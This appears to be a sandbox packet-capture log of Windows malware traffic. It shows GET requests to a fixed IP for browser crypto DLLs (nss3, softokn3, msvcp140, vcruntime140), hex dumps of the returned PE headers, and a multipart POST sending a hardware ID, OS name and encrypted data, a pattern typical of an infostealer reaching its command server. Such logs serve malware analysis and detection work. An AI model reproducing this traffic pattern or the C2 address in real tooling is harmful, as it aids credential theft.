Sep 27, 2021 18:33:08.663970947 CEST	1321	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:08 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Tue, 28 Sep 2021 16:33:08 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Sep 27, 2021 18:33:08.769380093 CEST	1465	OUT	GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 23.88.105.196 Connection: Keep-Alive
Sep 27, 2021 18:33:08.790802002 CEST	1466	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:08 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Tue, 28 Sep 2021 16:33:08 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Sep 27, 2021 18:33:09.061364889 CEST	1920	OUT	GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 23.88.105.196 Connection: Keep-Alive
Sep 27, 2021 18:33:09.082881927 CEST	1922	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:09 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Tue, 28 Sep 2021 16:33:09 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Sep 27, 2021 18:33:10.104836941 CEST	3264	OUT	GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 23.88.105.196 Connection: Keep-Alive
Sep 27, 2021 18:33:10.126363993 CEST	3265	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:10 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Tue, 28 Sep 2021 16:33:10 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Sep 27, 2021 18:33:10.232507944 CEST	3416	OUT	GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 23.88.105.196 Connection: Keep-Alive
Sep 27, 2021 18:33:10.254276991 CEST	3417	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:10 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Tue, 28 Sep 2021 16:33:10 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Sep 27, 2021 18:33:17.113476992 CEST	3503	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 86263 Host: 23.88.105.196 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2021 18:33:17.113619089 CEST	3518	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
Sep 27, 2021 18:33:17.136434078 CEST	3535	OUT	Data Raw: 43 3c ec ab c1 94 51 c8 69 53 ac db a4 f9 19 43 de 4b 82 d4 e4 f3 31 39 7c fe e6 96 c0 54 a3 30 ba 0e f4 71 a1 6a 7a 68 2f dc bb e5 a5 c3 1a 25 c8 d8 b1 d3 fd 4e f3 78 f5 11 dc c3 f3 81 a1 ef f1 d6 a2 ae c1 5e 57 a3 53 55 ad f9 eb 15 15 ba 1f d9 Data Ascii: C<QiSCK19\|T0qjzh/%Nx^WSUo5Ln'V}ji}u%q]KVO=2V$`p_j~=ax3(AbUT`@"E#OFfd:}cx1Q`yd%)\|DFbn!&P#0
Sep 27, 2021 18:33:17.136930943 CEST	3545	OUT	Data Raw: bd 53 36 ec 2a f1 aa 6e 2c 93 a2 dd 0e 6c 4c 5f e5 e6 ae 9e a1 f6 cb 61 f8 cd 3f 88 f1 63 49 e3 2a 73 0f 3d db 28 82 52 dc 0e 55 c8 99 f2 d1 e4 2e b4 44 fc 9c 90 6c f6 6d 69 69 69 f8 25 81 16 e6 60 9c 21 a8 9d 42 50 35 eb 36 de 4f c9 d6 dd 9e ec Data Ascii: S6n,lL_a?cIs=(RU.Dlmiii%`!BP56OkGkP@5;\yDz, .hARK`JUz-4NRUNA$3 Rl`hEmZk05/ Kv^-WZAcC5Z+,VNY=,U
Sep 27, 2021 18:33:17.157777071 CEST	3551	OUT	Data Raw: 0c 51 a7 6f 82 bc f5 f3 81 ad 56 e1 a3 ad fa 73 15 34 38 02 a2 5a c6 5e be 16 29 7b 1c ce 34 e5 d9 9a 7f b3 5a ba 72 72 6d b9 97 f9 0b d7 77 ff dd 1c ff a6 51 63 4f 8b d7 8f a6 37 1f 63 95 ff b5 74 97 6c 4a 2a 5a b3 bc a1 ea 45 3e 1a 92 27 73 c4 Data Ascii: QoVs48Z^){4ZrrmwQcO7ctlJZE>'sv\|<KcvsA2UI}~W6 YeQOU~?9w}cu!oR7si4,.n-kk}YkznOm
